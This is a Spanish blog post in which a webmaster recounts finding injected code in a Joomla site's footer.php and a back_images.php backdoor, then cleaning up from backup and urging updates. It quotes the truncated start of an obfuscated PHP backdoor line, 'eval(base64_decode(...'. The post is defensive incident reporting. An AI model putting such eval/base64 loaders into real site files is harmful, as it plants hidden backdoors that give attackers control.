Joomla backdoor inyecciones de código en mis archivos joomla

Hoy cuando ha amanecido, he accedido a Google Analytics y me ha resultado extraño no tener ninguna visita en mi página web desarrollada en Joomla, además solo cargaba la cabecera y el pie de página, junto con algunos css. No era el aspecto más deseable para acceder a mi web. Tras revisar todos los archivos no daba crédito, todo parecía normal y no funcionaba correctamente. Sin embargo en la carpeta includes, en el archivo footer.php, existía el siguiente código:

error_reporting(0);eval(base64_decode(‘JGxMOXdG

Una vulnerabilidad del código Joomla, que permite modificar varios archivos footer.php, dejando inutilizado el frontend y algunos de los archivos del administrator. Menos mal que tenía un backup, espero solucionarlo con la instalación de la última versión.
Esto me ha hecho pensar, que no hay que olvidar en actualizar a la última versión de Joomla siempre, se evitan cosas como estas, espero que no me hayan hecho más movidas en el servidor.

Edito este post hoy día 5/12/12 para indicar que he encontrado en la carpeta images un archivo llamado back_images.php, este archivo tiene unas inyecciones de código brutal.

Procedo a eliminarlo. Tras buscar en google este inicio de cadena he llegado a este post que me puede ayudar en sucesivas eliminaciones, me ha llamado la atención que al cambiar de servidor esta web, a un servidor linux, me ha vuelto a ocurrir las mismas inyecciones de código.

El post interesante encontrado es este:
http://crear-paginas-web.blogspot.com.es/2010/04/archivos-php-hackeados-con.html

Entradas relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.